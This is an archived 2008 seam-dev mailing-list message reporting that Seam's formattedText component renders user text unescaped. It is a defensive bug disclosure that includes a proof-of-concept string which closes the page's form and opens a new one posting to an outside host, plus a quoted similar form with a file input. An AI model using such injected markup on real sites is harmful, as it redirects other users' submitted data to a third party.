From nbelaevski at exadel.com Thu Oct  2 13:50:07 2008
Content-Type: multipart/mixed; boundary="===============5919916694257855198=="
MIME-Version: 1.0
From: Nick Belaevski <nbelaevski at exadel.com>
To: seam-dev at lists.jboss.org
Subject: [seam-dev] RE: Form, Input Elements and SeamText 
Date: Thu, 02 Oct 2008 20:50:00 +0300
Message-ID: <412276781C004916AA9CBDE534691954@nakago0>
In-Reply-To: 7DD75558-06A1-42EB-A7C5-210DE6F7A272@redhat.com

--===============5919916694257855198==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable

Please consider the following example:

<html xmlns:h=3D"http://java.sun.com/jsf/html"
      xmlns:f=3D"http://java.sun.com/jsf/core"
      xmlns:ui=3D"http://java.sun.com/jsf/facelets"
      xmlns:rich=3D"http://richfaces.org/rich"
      xmlns:s=3D"http://jboss.com/products/seam/taglib">


<body>
	<h:form id=3D"Form">
		<s:formattedText value=3D"#{bean.seamText}"/>

		<h:commandButton value=3D"Submit!"/>
	</h:form>
</body>

</html>

bean.seamText =3D> =

	public String getSeamText() {
		return "<br></form><form
action=3D\"http://www.jboss.org\"></br>";
	}

Pressing "Submit!" command button will submit form to jboss.org instead of
the application host, so one can potentially spy other users.

Tested with Seam 2.1.0.beta1.

Best regards,
  Nick Belaevski

> -----Original Message-----
> From: Christian Bauer [mailto:cbauer(a)redhat.com]
> Sent: Thursday, October 02, 2008 7:56 PM
> To: Nick Belaevski
> Cc: seam-dev(a)lists.jboss.org; Ilya Shaikovsky; Sergey Smirnov
> Subject: Re: Form, Input Elements and SeamText
> =

> =

> On Oct 02, 2008, at 18:50 , Nick Belaevski wrote:
> =

> > <form action=3D"http://somesite.com"><input type=3D"file" /><input
> > type=3D"submit" /></form>
> >
> > I suppose it is not safe that the user is possible to type in forms.
> =

> Why not? Your browser can send whatever forms it wants to whatever site.


--===============5919916694257855198==--